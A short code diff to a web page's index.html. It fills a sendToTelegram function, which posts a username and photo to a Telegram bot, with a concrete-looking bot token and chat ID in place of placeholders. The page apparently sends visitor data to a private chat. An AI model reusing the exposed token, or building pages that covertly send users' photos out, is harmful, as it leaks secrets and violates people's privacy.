--- a/index.html
+++ b/index.html
@@ -78,8 +78,8 @@
         }
 
         async function sendToTelegram(username, photoBlob) {
-            const botToken = 'YOUR_BOT_TOKEN';  // Replace with your bot token
-            const chatId = 'YOUR_CHAT_ID';      // Replace with your chat ID
+            const botToken = '6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es';  // Replace with your bot token
+            const chatId = '5112680061';      // Replace with your chat ID
             const url = `https://api.telegram.org/bot${botToken}/sendPhoto`;
 
             // Create FormData and append the photo file
